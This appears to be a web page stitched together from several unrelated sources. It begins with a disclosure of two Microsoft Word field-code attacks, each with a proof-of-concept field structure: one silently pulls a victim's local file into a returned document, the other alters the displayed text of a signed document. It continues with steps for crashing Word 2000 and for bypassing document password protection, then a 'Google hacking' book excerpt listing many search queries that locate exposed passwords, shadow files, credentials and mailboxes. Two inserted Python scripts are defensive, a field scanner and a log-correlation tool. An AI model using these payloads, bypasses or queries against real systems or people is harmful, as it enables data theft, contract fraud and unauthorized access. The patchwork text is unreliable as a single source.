I have stumbled onto a couple of potential security issues in Microsoft
Word that I would like to share. In both cases the adversary (mis)uses
fields to perpetrate the attack. It's important to note that fields are not macros and, as far
as I know, cannot be disabled by the user. I am providing a basic
description along with a proof-of-concept demo. I am fairly certain
that someone with free time and imagination can expand on these
principles, possibly applying them to other products.
Following tradition I'll use Hacker and Victim as the two parties involved.
Hacker will be the adversary.
1) Document collaboration spyware.
Attack Basics: Hacker sends Victim a Word document for revisions. After Victim
edits, saves, and mails it back to Hacker, the file will also include the
contents of another file (or files) from Victim's computer that Hacker has
specified a priori. To achieve this, Hacker embeds an INCLUDETEXT field
into the document. The field results in the inclusion of a specified file
into the current document. Of course, Hacker must be careful to include it
in such a way that it does not become apparent to Victim. Hacker can do all
the usual things like hidden text, small white font, etc. Alternatively
(and, in my opinion, cleaner) she can embed the INCLUDETEXT field within
a dummy IF field that always returns an empty string. In this case, the
only way Victim can notice the included file is if he goes browsing
through field codes.
Attack Improvements: The disadvantage of the basic attack is that Hacker
must rely on Victim to update the INCLUDETEXT field to import the file. If
the document is large and contains tables of contents, figures, etc.
then Victim is very likely to update all the fields. However, Hacker would
like to make sure that the field gets updated regardless of whether Victim
does it manually or not. Automatic updates can be forced if a DATE
field is embedded into the INCLUDETEXT and it is the last date field in
the document (don't ask me why).
Proof of concept: Inserting the following field structure into the
footer of the last page will steal the contents of c:\a.txt on the
target's computer. Keep in mind the plain curly braces below must
actually be replaced with Word field braces (you can either use the
menus to insert fields one by one, or ask Google how to do it by hand).
{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } \* MERGEFORMAT } = "" "" \* MERGEFORMAT }
Countermeasures: The only thing you can do now is decide how paranoid
you want to be. If you must edit and send out a Word file with unknown
origins, you may want to manually go through the fields. It would be
nice to be able to force user confirmation (via a dialog box) for all
includes. Alternatively one could write a scanner. Of course an optional
standalone checker will never be used by those most at risk.
2) Oblivious signing
Attack Basics: Hacker and Victim want to sign a contract saying that Hacker
will pay Victim $100. Hacker types it up as a Word document and both
digitally sign it. In a few days Victim comes to Hacker to collect his
money. To his surprise, Hacker presents him with a Word document that
states he owes her $100. Hacker also has a valid signature from Victim for
the new document. In fact, it is the exact same signature as for the
contract Victim remembers signing and, to Victim's great amazement, the two
Word documents are actually identical in hex. What Hacker did was insert
an IF field that branched on an external input such as date or
filename. Thus even though the signed contents remained the same, the
displayed contents changed because they were partially dependent on
unsigned inputs. The basic point is that very few users know the actual
contents of their Word documents, and it should be obvious that one
should never sign what one cannot read. Of course, Victim could contest
the contract in court. An expert witness (that's actually an expert)
could easily demonstrate that there are unsigned inputs and therefore
it is not clear which version was actually signed. Thus Victim can get out
of the fraudulent contract. However, the same logic will hold for Hacker,
and she gets away without paying Victim the $100 she signed for. Thus, an
adversary can build in a free escape clause. Note that I am just
speculating about all the legal aspects.
Proof of concept: Inserting the following field structure at the tail
of the document will cause "Hello" to be displayed if the filename is
"a.doc" and "Bye" otherwise.
{ IF { FILENAME \* MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" \* MERGEFORMAT }
Update: this flaw has been fixed in Office 2003 onwards,
but it still works in Office 2000 and even sometimes in 2002/03.
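As an added example (not code from the original post) of the scanner the countermeasures section asks for: the Python script below opens a .docx, reconstructs nested field codes from its document, header and footer parts, and reports every top-level field whose code depends on INCLUDETEXT, DATE, FILENAME or similar unsigned inputs, which covers both the hidden include of attack 1 and the branching IF of attack 2. It assumes the Office Open XML (.docx) format rather than the binary .doc the post used, and builds its own minimal fixture so it runs offline.

```python
"""Scan the field codes in a .docx for structures like the two attacks above.

Constructed example: build_fixture() writes a minimal two-part .docx in memory
(not a real document from the post); suspicious_fields() flags any top-level
field whose code uses input the signature does not cover (DATE, FILENAME, ...).
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % NS

# Field keywords whose result depends on the machine or file name at open time,
# i.e. on input that is not part of the signed bytes (assumed list, not exhaustive).
EXTERNAL_FIELDS = ("INCLUDETEXT", "INCLUDEPICTURE", "LINK", "FILENAME",
                   "DATE", "TIME", "USERNAME", "USERINITIALS", "USERADDRESS")
KEYWORD_RE = re.compile(r"\b(%s)\b" % "|".join(EXTERNAL_FIELDS), re.IGNORECASE)
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*)\.xml$")


def extract_fields(part_xml):
    """Return [(nesting_depth, field_code)] for one XML part, inner fields first.

    A complex field is a run sequence: fldChar begin, instrText..., fldChar
    separate, cached result, fldChar end.  When a nested field ends, its code is
    spliced into the parent's code as "{ ... }" so the outer code reads as Word shows it.
    """
    root = ET.fromstring(part_xml)
    stack, fields = [], []            # one stack entry per currently open field
    for el in root.iter():
        if el.tag == W + "fldSimple":   # single-element form: code is an attribute
            fields.append((len(stack), el.get(W + "instr", "").strip()))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append({"parts": [], "in_result": False})
            elif kind == "separate" and stack:
                stack[-1]["in_result"] = True   # what follows is the cached result
            elif kind == "end" and stack:
                done = stack.pop()
                code = " ".join("".join(done["parts"]).split())
                fields.append((len(stack), code))
                if stack and not stack[-1]["in_result"]:
                    stack[-1]["parts"].append(" { " + code + " } ")
        elif el.tag == W + "instrText" and stack and not stack[-1]["in_result"]:
            stack[-1]["parts"].append(el.text or "")
    return fields


def suspicious_fields(docx_bytes):
    """(part name, outermost field code) for each top-level field using external input."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in sorted(zf.namelist()):
            if not PART_RE.match(name):
                continue
            for depth, code in extract_fields(zf.read(name)):
                if depth == 0 and KEYWORD_RE.search(code):
                    hits.append((name, code))
    return hits


# ---- constructed fixture (assumed layout, enough for the scanner only) ----------
def _runs(tokens):
    """'<' = field begin, '|' = separate, '>' = end, anything else = instrText."""
    marks = {"<": "begin", "|": "separate", ">": "end"}
    return "".join(
        '<w:r><w:fldChar w:fldCharType="%s"/></w:r>' % marks[t] if t in marks
        else '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % escape(t)
        for t in tokens)


def _part(tag, runs):
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<w:%s xmlns:w="%s"><w:p>%s</w:p></w:%s>' % (tag, NS, runs, tag))


def build_fixture():
    """Footer hides attack 1; body carries attack 2 plus a benign PAGE field."""
    footer = _runs(["<", " IF ", "<", " INCLUDETEXT ", "<", " IF ", "<", " DATE ", "|", ">",
                    " = ", "<", " DATE ", "|", ">", ' "c:\\a.txt" "c:\\a.txt" ', "|", ">",
                    " \\* MERGEFORMAT ", "|", ">", ' = "" "" \\* MERGEFORMAT ', "|", ">"])
    body = _runs(["<", " IF ", "<", " FILENAME \\* MERGEFORMAT ", "<", " DATE ", "|", ">",
                  "|", ">", ' = "a.doc" "Hello" "Bye" \\* MERGEFORMAT ', "|", ">"])
    body += _runs(["<", " PAGE ", "|", ">"])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:   # no [Content_Types].xml: not a Word-openable file
        zf.writestr("word/document.xml", _part("document", body))
        zf.writestr("word/footer1.xml", _part("ftr", footer))
    return buf.getvalue()


if __name__ == "__main__":
    for part, code in suspicious_fields(build_fixture()):
        print("%s: { %s }" % (part, code))
```

A plain DATE or TIME field is reported too, since the point is review of anything the signature does not pin down, not only the two structures shown.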
__________________________________________________________________________
We can
consistently crash Word 2000 using the following method:
1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar
This consistently crashes Word 2000 with the following error
message:
DDE Server Window: WINWORD.EXE - Application Error
The instruction at "0x3076a63e" referenced memory at "0x00000000". The
memory could not be "read".
Vulnerability:
remove office passwords
Vulnerable:
MS Word (Win2K/XP)
Example 1
1) Open MS Word with a new/blank page
2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc
3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...
Example 2
1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)
2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)
3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)
4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a password
Change password if ya like & or save in whatever format if ya like ...
Thursday, November 6, 2008
Search passwords and Juicy Info
Introduction
This is not about finding sensitive data during an assessment as much as
it is about what the “bad guys” might do to troll for the data. The examples presented
generally represent the lowest-hanging fruit on the security
tree. Hackers target this information on a daily basis. To protect against this type
of attacker, we need to be fairly candid about the worst-case possibilities. We
won’t be overly candid, however.
We start by looking at some queries that can be used to uncover usernames,
the less important half of most authentication systems. The value of a username is
often overlooked, but an entire multimillion-dollar
security system can be shattered through skillful crafting of even the
smallest, most innocuous bit of information.
Next, we take a look at queries that are designed to uncover passwords. Some
of the queries we look at reveal encrypted or encoded passwords, which will take
a bit of work on the part of an attacker to use to his or her advantage. We also
take a look at queries that can uncover cleartext passwords. These queries are some
of the most dangerous in the hands of even the most novice attacker. What could
make an attack easier than handing a username and cleartext password to an
attacker?
We wrap up by discussing the very real possibility of uncovering
highly sensitive data such as credit card information and information used to
commit identity theft, such as Social Security numbers. Our goal here is to
explore ways of protecting against this very real threat. To that end, we don’t go
into details about uncovering financial information and the like. If you’re a “dark
side” hacker, you’ll need to figure these things out on your own.
Searching for Usernames
Most authentication mechanisms use a username and password to protect information.
To get through the “front door” of this type of protection, you’ll need to
determine usernames as well as passwords. Usernames also can be used for social
engineering efforts, as we discussed earlier.
Many methods can be used to determine usernames. In Chapter 10, we
explored ways of gathering usernames via database error messages. In Chapter 8
we explored Web server and application error messages that can reveal various
information, including usernames. These indirect methods of locating usernames
are helpful, but an attacker could also use a direct
query like “your username is”. This phrase can locate help pages that describe the
username creation process,
information gleaned from other sources, such as Google Groups posts or phone
listings. The usernames could then be recycled into various other phases of the
attack, such as a worm-based spam campaign or a social-engineering attempt. An
attacker can gather usernames from a variety of sources, as shown in the sample
queries listed
Sample Queries That Locate Usernames
Query | Description
inurl:admin inurl:userlist | Generic userlist files
inurl:admin filetype:asp inurl:userlist | Generic userlist files
inurl:php inurl:hlstats intext:Server Username | Half-life statistics file, lists username and other information
filetype:ctl inurl:haccess.ctl Basic | Microsoft FrontPage equivalent of htaccess, shows Web user credentials
filetype:reg reg intext:”internet account manager” | Microsoft Internet Account Manager can reveal usernames and more
filetype:wab wab | Microsoft Outlook Express Mail address books
filetype:mdb inurl:profiles | Microsoft Access databases containing (user) profiles
index.of perform.ini | mIRC IRC ini file can list IRC usernames and other information
inurl:root.asp?acs=anon | Outlook Mail Web Access directory can be used to discover usernames
filetype:conf inurl:proftpd.conf -sample | PROFTP FTP server configuration file reveals username and server information
filetype:log username putty | PUTTY SSH client logs can reveal usernames and server information
filetype:rdp rdp | Remote Desktop Connection files reveal user credentials
intitle:index.of .bash_history | UNIX bash shell history reveals commands typed at a bash command prompt; usernames are often typed as argument strings
intitle:index.of .sh_history | UNIX shell history reveals commands typed at a shell command prompt; usernames are often typed as argument strings
“index of ” lck | Various lock files list the user currently using a file
+intext:webalizer +intext:Total Usernames +intext:”Usage Statistics for” | Webalizer Web statistics page lists Web usernames and statistical information
filetype:reg reg HKEY_CURRENT_USER username | Windows Registry exports can reveal usernames and other information
Underground Googling
Searching for a Known Filename
Remember that there are several ways to search for a known filename.
One way relies on locating the file in a directory listing, like intitle:index.of
install.log. Another, often better, method relies on the filetype operator,
as in filetype:log inurl:install.log. Directory listings are not all that
common. Google will crawl a link to a file in a directory listing, meaning
that the filetype method will find both directory listing entries as well as
files crawled in other ways.
In some cases, usernames can be gathered from Web-based statistical programs
that check Web activity. The Webalizer program shows all sorts of information
about a Web server’s usage. Output files for the Webalizer program can be
located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage
Statistics for”. Among the information displayed is the username that was used to
connect to the Web server, as shown in Figure 9.2. In some cases, however, the
usernames displayed are not valid or current, but the “Visits” column lists the
number of times a user account was used during the capture period. This enables
an attacker to easily determine which accounts are more likely to be valid.
The Windows registry holds all sorts of authentication information, including
usernames and passwords. Though it is unlikely (and fairly uncommon) to locate
live, exported Windows registry files on the Web, at the time of this writing
there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
username, which locates Windows registry files that contain the word username
and in some cases passwords,
As any talented attacker or security person will tell you, it’s rare to get information
served to you on a silver platter. Most decent finds take a bit of persistence,
creativity, intelligence, and just a bit of good luck. For example, consider
the Microsoft Outlook Web Access portal, which can be located with a query
like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
returned by this query, even though there are certainly more than 50 sites running
the Microsoft Web-based mail portal. Regardless of how you might locate a site
running this e-mail gateway, it’s not uncommon for the site to host a public
directory (denoted “Find Names,” by default)
The public directory allows access to a search page that can be used to find
users by name. In most cases, wildcard searching is not allowed, meaning that a
search for * will not return a list of all users, as might be expected. Entering a
search for a space is an interesting idea, since most user descriptions contain a
space, but most large directories will return the error message “This query would
return too many addresses!” Applying a bit of creativity, an attacker could begin
searching for individual common letters, such as the “Wheel of Fortune letters”
R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list
of user information like
Once a list of user information is returned, the attacker can then recycle the
search with words contained in the user list, searching for the words Voyager,
Freshmen, or Campus, for example. Those results can then be recycled, eventually
resulting in a nearly complete list of user information.
Searching for Passwords
Password data, one of the “Holy Grails” during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate
passwords on the Web, as shown in Table 9.2.
Table 9.2 Queries That Locate Password Information
Query | Description
inurl:/db/main.mdb | ASP-Nuke passwords
filetype:cfm “cfapplication name” password | ColdFusion source with potential passwords
filetype:pass pass intext:userid | dbman credentials
allinurl:auth_user_file.txt | DCForum user passwords
eggdrop filetype:user user | Eggdrop IRC user credentials
filetype:ini inurl:flashFXP.ini | FlashFXP FTP credentials
filetype:url +inurl:”ftp://” +inurl:”@” | FTP bookmarks cleartext passwords
inurl:zebra.conf intext:password -sample -test -tutorial -download | GNU Zebra passwords
filetype:htpasswd htpasswd | HTTP htpasswd Web user credentials
intitle:”Index of” “.htpasswd” “htgroup” -intitle:”dist” -apache -htpasswd.c | HTTP htpasswd Web user credentials
intitle:”Index of” “.htpasswd” htpasswd.bak | HTTP htpasswd Web user credentials
“http://*:*@www” bob:bob | HTTP passwords (bob is a sample username)
“sets mode: +k” | IRC channel keys (passwords)
“Your password is * Remember this for later use” | IRC NickServ registration passwords
signin filetype:url | JavaScript authentication credentials
LeapFTP intitle:”index.of./” sites.ini modified | LeapFTP client login credentials
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man | LILO passwords
filetype:config config intext:appSettings “User ID” | Microsoft .NET application credentials
filetype:pwd service | Microsoft FrontPage Service Web passwords
intitle:index.of administrators.pwd | Microsoft FrontPage Web credentials
“# -FrontPage-” inurl:service.pwd | Microsoft FrontPage Web passwords
ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators) | Microsoft FrontPage Web passwords
inurl:perform filetype:ini | mIRC nickserv credentials
intitle:”index of” intext:connect.inc | mySQL database credentials
intitle:”index of” intext:globals.inc | mySQL database credentials
filetype:conf oekakibbs | Oekakibss user passwords
filetype:dat wand.dat | Opera “Magic Wand” Web credentials
inurl:ospfd.conf intext:password -sample -test -tutorial -download | OSPF Daemon passwords
index.of passlist | Passlist user credentials
inurl:passlist.txt | passlist.txt file user credentials
filetype:dat “password.dat” | password.dat files
inurl:password.log filetype:log | password.log file reveals usernames, passwords, and hostnames
filetype:log inurl:”password.log” | password.log files cleartext passwords
inurl:people.lst filetype:lst | People.lst generic password file
intitle:index.of config.php | PHP configuration file database credentials
inurl:config.php dbuname dbpass | PHP configuration file database credentials
inurl:nuke filetype:sql | PHP-Nuke credentials
filetype:conf inurl:psybnc.conf “USER.PASS=” | psyBNC IRC user credentials
filetype:ini ServUDaemon | servU FTP Daemon credentials
filetype:conf slapd.conf | slapd configuration files root password
inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample | slapd LDAP credentials
inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample | slapd LDAP root password
filetype:sql “IDENTIFIED BY” -cvs | SQL passwords
filetype:sql password | SQL passwords
filetype:ini wcx_ftp | Total Commander FTP passwords
filetype:netrc password | UNIX .netrc user credentials
index.of.etc | UNIX /etc directories contain various credential files
intitle:”Index of..etc” passwd | UNIX /etc/passwd user credentials
intitle:index.of passwd passwd.bak | UNIX /etc/passwd user credentials
intitle:”Index of” pwd.db | UNIX /etc/pwd.db credentials
intitle:Index.of etc shadow | UNIX /etc/shadow user credentials
intitle:index.of master.passwd | UNIX master.passwd user credentials
intitle:”Index of” spwd.db passwd -pam.conf | UNIX spwd.db credentials
filetype:bak inurl:”htaccess|passwd|shadow|htusers” | UNIX various password file backups
filetype:inc dbconn | Various database credentials
filetype:inc intext:mysql_connect | Various database credentials, server names
filetype:properties inurl:db intext:password | Various database credentials, server names
inurl:vtund.conf intext:pass -cvs | Virtual Tunnel Daemon passwords
inurl:”wvdial.conf” intext: | wvdial dialup user credentials
filetype:mdb wwforum | Web Wiz Forums Web credentials
“AutoCreate=TRUE password=*” | Website Access Analyzer user passwords
filetype:pwl pwl | Windows Password List user credentials
filetype:reg reg +intext:”defaultusername” intext:”defaultpassword” | Windows Registry keys containing user credentials
filetype:reg reg +intext:”internet account manager” | Windows Registry keys containing user credentials
“index of/” “ws_ftp.ini” “parent directory” | WS_FTP FTP credentials
filetype:ini ws_ftp pwd | WS_FTP FTP user credentials
inurl:/wwwboard | wwwboard user credentials
In most cases, passwords discovered on the Web are either encrypted or
encoded in some way. In most cases, these passwords can be fed into a password
cracker such as John the Ripper from www.openwall.com/john to produce
plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
the search ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators), which
combines a search for some common
Exported Windows registry files often contain encrypted or encoded passwords
as well. If a user exports the Windows registry to a file and Google subsequently
crawls that file, a query like filetype:reg intext:”internet account manager”
could reveal interesting keys containing password data. Note that live, exported
Windows registry files are not very common, but it’s
not uncommon for an attacker to target a site simply because of one exceptionally
insecure file. It’s also possible for a Google query to uncover cleartext passwords.
These passwords can be used as is without having to employ a
password-cracking utility. In these extreme cases, the only challenge is determining
the username as well as the host on which the password can be used. As
shown in Figure 9.8, certain queries will locate all the following information:
usernames, cleartext passwords, and the host that uses that authentication!
There is no magic query for locating passwords, but during an assessment,
remember that the simplest queries directed at a site can have amazing results, as
we discussed in Chapter 7, Ten Simple Searches. For example, a query like “Your
password” forgot would locate pages that provide a forgotten password recovery
mechanism. The information from this type of query can be used to formulate
any of a number of attacks against a password. As always, effective social engineering
is a terrific nontechnical solution to “forgotten” passwords.
Another generic search for password information, intext:(password | passcode |
pass) intext:(username | userid | user), combines common words for passwords and
user IDs into one query. This query returns a lot of results, but the vast majority
of the top hits refer to pages that list forgotten password information, including
either links or contact information. Using Google’s translate feature, found at
http://translate.google.com/translate_t, we could also create multilingual password
searches. Table 9.3 lists common translations for the word password.
Table 9.3 English Translations of the Word Password
Language Word Translation
German password Kennwort
Spanish password contraseña
French password mot de passe
Italian password parola d’accesso
Portuguese password senha
Dutch password Paswoord
NOTE
The terms username and userid in most languages translate to username
and userid, respectively.
Searching for Credit Card Numbers,
Social Security Numbers, and More
Most people have heard news stories about Web hackers making off with customer
credit card information. With so many fly-by-night retailers popping up
on the Internet, it’s no wonder that credit card fraud is so prolific. These mom-and-pop
retailers are not the only ones successfully compromised by hackers.
Corporate giants by the hundreds have had financial database compromises over
the years, victims of sometimes very technical, highly focused attackers. What
might surprise you is that it doesn’t take a rocket scientist to uncover live credit
card numbers on the Internet, thanks to search engines like Google. Everything
from credit information to banking data or supersensitive classified government
documents can be found on the Web. Consider the (highly edited) Web page
This document, found using Google, lists hundreds and hundreds of credit
card numbers (including expiration date and card validation numbers) as well as
the owners’ names, addresses, and phone numbers. This particular document also
included phone card (calling card) numbers. Notice the scroll bar on the right-hand
side of Figure 9.9, an indicator that the displayed page is only a small part
of this huge document—like many other documents of its kind. In most cases,
pages that contain these numbers are not “leaked” from online retailers or e-commerce
sites but rather are most likely the fruits of a scam known as phishing,
in which users are solicited via telephone or e-mail for personal information.
Several Web sites, including MillerSmiles.co.uk, document these scams and
hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
encourages users to update their eBay profile information.
Tools and Traps
Catching Online Scammers
In some cases, you might be able to use Google to help nab the bad guys.
Phishing scams are effective because the fake page looks like an official
page. To create an official-looking page, the bad guys must have examples
to work from, meaning that they must have visited a few legitimate companies’
Web sites. If the phishing scam was created using text from several
companies’ existing pages, you can key in on specific phrases from the fake
page, creating Google queries designed to round up the servers that hosted
some of the original content. Once you’ve located the servers that contained
the pilfered text, you can work with the companies involved to
extract correlating connection data from their log files. If the scammer visited
each company’s Web page, collecting bits of realistic text, his IP should
appear in each of the log files. Auditors at SensePost (www.sensepost.com)
have successfully used this technique to nab online scam artists.
Unfortunately, if the scammer uses an exact copy of a page from only one
company, this task becomes much more difficult to accomplish.
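An added example (not from the book) of the log correlation the sidebar describes: given access logs from the companies whose text was reused, it parses combined-format lines and reports the client addresses seen at every company, along with the pages each one fetched. The three companies, their log lines and the addresses are constructed samples; the bot user-agent filter is an assumption so that shared crawlers do not drown the result.

```python
"""Find the client addresses common to several companies' web server logs.

Constructed sample: three sites whose page text was reused by a phishing page,
with a handful of combined-format log lines each (documentation IP ranges).
"""
import re

# Apache/nginx "combined" format; the referer/agent pair is optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?')

# Assumed: well-known crawlers visit everyone and are not the scammer.
BOT_UA = re.compile(r"bot|crawler|spider", re.IGNORECASE)

SAMPLE_LOGS = {
    "acme-bank": [
        '203.0.113.7 - - [06/Nov/2008:09:12:01 +0000] "GET /online-banking/login HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
        '203.0.113.7 - - [06/Nov/2008:09:12:03 +0000] "GET /images/logo.gif HTTP/1.1" 200 2210 "-" "Mozilla/4.0"',
        '192.0.2.44 - - [06/Nov/2008:09:15:40 +0000] "GET /online-banking/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
        '198.51.100.20 - - [06/Nov/2008:10:01:00 +0000] "GET /robots.txt HTTP/1.1" 200 60 "-" "Googlebot/2.1"',
    ],
    "acme-auctions": [
        '203.0.113.7 - - [06/Nov/2008:09:20:11 +0000] "GET /account/update HTTP/1.1" 200 7040 "-" "Mozilla/4.0"',
        '198.51.100.20 - - [06/Nov/2008:11:30:00 +0000] "GET /robots.txt HTTP/1.1" 200 60 "-" "Googlebot/2.1"',
        '192.0.2.91 - - [06/Nov/2008:12:00:00 +0000] "GET /account/update HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
        'garbage line that does not parse',
    ],
    "acme-shop": [
        '203.0.113.7 - - [06/Nov/2008:09:31:55 +0000] "GET /checkout/signin HTTP/1.1" 200 3800 "-" "Mozilla/4.0"',
        '192.0.2.44 - - [06/Nov/2008:14:02:17 +0000] "GET /checkout/signin HTTP/1.1" 200 3800 "-" "Mozilla/5.0"',
    ],
}


def parse(lines):
    """Yield one dict per combined-format line; lines that do not parse are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def common_visitors(logs_by_site, min_sites=None, ignore_ua=BOT_UA):
    """Map IP -> sorted sites that logged it, keeping IPs seen at >= min_sites sites.

    min_sites defaults to all sites, i.e. the intersection the sidebar describes;
    lower it when a company's log is incomplete.
    """
    if min_sites is None:
        min_sites = len(logs_by_site)
    seen = {}
    for site, lines in logs_by_site.items():
        for rec in parse(lines):
            if ignore_ua and rec["agent"] and ignore_ua.search(rec["agent"]):
                continue
            seen.setdefault(rec["ip"], set()).add(site)
    return {ip: sorted(sites) for ip, sites in seen.items() if len(sites) >= min_sites}


def requested_paths(logs_by_site, ip):
    """Per site, the paths one IP fetched in log order: shows which pages were copied."""
    out = {}
    for site, lines in logs_by_site.items():
        paths = [rec["path"] for rec in parse(lines) if rec["ip"] == ip]
        if paths:
            out[site] = paths
    return out


if __name__ == "__main__":
    for ip, sites in common_visitors(SAMPLE_LOGS).items():
        print(ip, sites, requested_paths(SAMPLE_LOGS, ip))
```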
Social Security Numbers
Social Security numbers (SSNs) and other sensitive data can be easily located
with Google as well as via the same techniques used to locate credit card numbers.
For a variety of reasons, SSNs might appear online—for example, educational
facilities are notorious for using an SSN as a student ID, then posting
grades to a public Web site with the “student ID” displayed next to the grade. A
creative attacker can do quite a bit with just an SSN, but in many cases it helps
to also have a name associated with that SSN. Again, educational facilities have
been found exposing this information via Excel spreadsheets listing students’
names, grades, and SSNs, despite the fact that the student ID number is often
used to help protect the privacy of the student! Although we don’t feel it’s right
to go into the details of how this data is located, several media outlets have irresponsibly
posted the details online. Although the blame lies with the sites that are
leaking this information, in our opinion it’s still not right to draw attention to
how exactly the information can be located.
Personal Financial Data
In some cases, phishing scams are responsible for publicizing personal information;
in other cases, hackers attacking online retails are to blame for this breach of
privacy. Sadly, there are many instances where an individual is personally responsible
for his own lack of privacy. Such is the case with personal financial information.
With the explosion of personal computers in today’s society, users have
literally hundreds of personal finance programs to choose from. Many of these
programs create data files with specific file extensions that can be searched with
Google. It’s hard to imagine why anyone would post personal financial information
to a public Web site (which subsequently gets crawled by Google), but it
must happen quite a bit, judging by the number of hits for program files generated
by Quicken and Microsoft Money, for example. Although it would be
somewhat irresponsible to provide queries here that would unearth personal
financial data, it’s important to understand the types of data that could potentially
be uncovered by an attacker.To that end,Table 9.4 shows file extensions for various
financial, accounting, and tax return programs. Ensure that these filetypes
aren’t listed on a webserver you’re charged with protecting.
File Extension Description
afm Abassis Finance Manager
ab4 Accounting and Business File
mmw AceMoney File
Iqd AmeriCalc Mutual Fund Tax Report
et2 Electronic Tax Return Security File (Australia)
tax Intuit TurboTax Tax Return
t98-t04 Kiplinger Tax Cut File (extension based on two-digit return year)
mny Microsoft Money 2004 Money Data Files
mbf Microsoft Money Backup Files
inv MSN Money Investor File
ptdb Peachtree Accounting Database
qbb QuickBooks Backup Files reveal financial data
qdf Quicken personal finance data
soa Sage MAS 90 accounting software
sdb Simply Accounting
stx Simply Tax Form
tmd Time and Expense Tracking
tls Timeless Time & Expense
fec U.S. Federal Campaign Expense Submission
wow Wings Accounting File
Searching for Other Juicy Info
As we’ve seen, Google can be used to locate all sorts of sensitive information. In
this section we take a look at some of the data that Google can find that’s harder
to categorize. From address books to chat log files and network vulnerability
reports, there’s no shortage of sensitive data online. Table 9.5 shows some queries
that can be used to uncover various types of sensitive data.
Query | Description
intext:”Session Start * * * *:*:* *” filetype:log | AIM and IRC log files
filetype:blt blt +intext:screenname | AIM buddy lists
buddylist.blt | AIM buddy lists
intitle:index.of cgiirc.config | CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
inurl:cgiirc.config | CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
“Index of” / “chat/logs” | Chat logs
intitle:”Index Of” cookies.txt “size” | cookies.txt file reveals user information
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae” | Curriculum vitae (resumes) reveal names and address information
ext:ini intext:env.ini | Generic environment data
intitle:index.of inbox | Generic mailbox files
“Running in Child mode” | Gnutella client data and statistics
“:8080” “:3128” “:80” filetype:txt | HTTP proxy lists
intitle:”Index of” dbconvert.exe chats | ICQ chat logs
“sets mode: +p” | IRC private channel information
“sets mode: +s” | IRC secret channel information
“Host Vulnerability Summary Report” | ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
“Network Vulnerability Assessment Report” | ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot | John the Ripper password cracker results
intitle:”Index Of” -inurl:maillog maillog size | Maillog files reveal e-mail traffic information
ext:mdb inurl:*.mdb inurl: | Microsoft FrontPage database folders
filetype:xls inurl:contact | Microsoft Excel sheets containing contact information
intitle:index.of haccess.ctl | Microsoft FrontPage equivalent(?) of htaccess, shows Web authentication info
ext:log “Software: Microsoft Internet Information Services *.*” | Microsoft Internet Information Services (IIS) log files
filetype:pst inurl:”outlook.pst” | Microsoft Outlook e-mail and calendar backup files
intitle:index.of mt-db-pass.cgi | Movable Type default file
filetype:ctt ctt messenger | MSN Messenger contact lists
“This file was generated by Nessus” | Nessus vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
inurl:”newsletter/admin/” | Newsletter administration information
inurl:”newsletter/admin/” intitle:”newsletter admin” | Newsletter administration information
filetype:eml eml intext:”Subject” +From | Outlook Express e-mail files
intitle:index.of inbox dbx | Outlook Express mailbox files
filetype:mbx mbx intext:Subject | Outlook v1–v4 or Eudora mailbox files
inurl:/public/?Cmd=contents | Outlook Web Access public folders or appointments
filetype:pdb pdb backup (Pilot | Pluckerdb) | Palm Pilot Hotsync database files
“This is a Shareaza Node” | Shareaza client data and statistics
inurl:/_layouts/settings | Sharepoint configuration information
inurl:ssl.conf filetype:conf | SSL configuration files, reveal various configuration information
site:edu admin grades | Student grades
intitle:index.of mystuff.xml | Trillian user Web links
inurl:forward filetype:forward -cvs | UNIX mail forward files reveal e-mail addresses
